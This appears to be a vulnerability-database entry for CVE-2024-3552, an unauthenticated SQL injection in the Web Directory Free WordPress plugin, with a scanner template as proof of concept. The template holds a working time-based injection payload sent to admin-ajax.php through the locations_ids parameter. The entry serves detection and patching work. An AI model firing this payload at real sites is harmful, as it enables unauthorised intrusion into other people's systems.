CVE-2024-3552: Web Directory Free < 1.7.0 - SQL Injection

2025-08-01 Web Directory Free PoC Public

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.

PoC

id: CVE-2024-3552

info:
  name: Web Directory Free < 1.7.0 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.
  impact: |
    Unauthenticated attackers can execute time-based SQL injection attacks via the locations_ids parameter.
  remediation: |
    Update Web Directory Free to version 1.7.0 or later.
  reference:
    - https://vulners.com/wpvulndb/CVE-2024-3552
    - https://wpscan.com/vulnerability/34b03ee4-de81-4fec-9f3d-e1bd5b94d136/
  classification:
    epss-score: 0.6706
    epss-percentile: 0.9926
    cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: salephpscripts
    product: web_directory_free
    publicwww-query: "/wp-content/plugins/web-directory-free"
  tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/web-directory-free"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(6),0)+from+(select+1)x)

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - regex('^\[\]$', body)
        condition: and
# digest: 490a004630440220423e30d8aee79dbf7f91492add6948d4d8031d7d3207a105e7803ba67e1bbe25022046935370e86052fcd27850e30dbe2ca2b9943b370cdade1da09cc3560a4be4ae:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities